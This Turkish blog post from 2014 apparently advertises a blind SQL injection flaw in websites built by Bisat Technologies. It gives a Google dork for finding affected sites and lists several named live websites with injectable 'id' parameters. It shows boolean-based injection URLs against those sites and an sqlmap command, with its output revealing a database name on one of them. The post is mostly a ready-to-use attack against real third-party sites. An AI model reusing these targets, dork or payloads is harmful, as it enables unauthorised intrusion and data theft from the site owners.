25 Ağustos 2014 Pazartesi

Bisat Technologies Pvt Ltd => Functions 'id' Blind SQL Injection Vulnerabilities

~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~
Web App. : Bisat Technologies Pvt Ltd
|~Price : N/A
|~Software Official : http://www.bisat.in/
|~Vulnerability : SQL Injection
|~Vulnerability Dir : /
|~Risk : Medium
|~Google DORK : "Powered by Bisat Technologies Pvt Ltd"
|[~]Date : "26 AG 2014"
|[~]Tested on : Kali Linux
####################################################
INFO;
(for sql injection) hard to give a file name is not correct..
because the software is special. Each site differs filenames
###################################################
----------------------------------------------------------
Php Files 'id' functions Not security
---------------------------------------------------------
Example DEMO Site'z.

http://www.prosanctitymovementindia.in/newsr.php?id=36%27
http://www.archanawomencentre.com/news.php?id=15%27
http://www.prosanctitymovementindia.in/mday.php?id=20%27
http://www.marthomavidyanikethan.com/marthoma_dynamic.php?id=2%27
http://rajphotos4u.com/photo-gallery-subcat.php?id=4%27
http://www.samooham.com/samooham_dynamiccontents.php?id=3%27
http://www.kevinsindia.com/kevin-products.php?category_id=2&subcategory_id=0%27
http://amalgamfoods.com/amalgam_subcategory.php?categoryid=9&companyid=3         
http://krishnacars.com/krishna_dynamic.php?id=2%27
etc..
etc..

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============================================================
|{~~~~~~~~ Example Explotation| SQL Injection ~~~~~~~~~~}|

[TARGET.COM]/[path]/?????.php?id= //SQL Command

http://amalgamfoods.com/amalgam_subcategory.php?categoryid=9%27%20and%201=1
http://amalgamfoods.com/amalgam_subcategory.php?categoryid=9%27%20and%201=4
http://rajphotos4u.com/photo-gallery-subcat.php?id=4%20and%201=1
http://rajphotos4u.com/photo-gallery-subcat.php?id=4%20and%201=56
www.prosanctitymovementindia.in/newsr.php?id=36' and 1=1
www.prosanctitymovementindia.in/newsr.php?id=36' and 1=56
ETC..
ETC..

##
sqlmap -u "http://amalgamfoods.com/amalgam_subcategory.php?categoryid=9&companyid=3" --dbs --no-cast
[*] amalgamf_amalgam
###
====================================================================

FINISH.
Gönderen KnocKout zaman: 13:48

Hiç yorum yok:

Yorum Gönder

Kaydol: Kayıt Yorumları (Atom)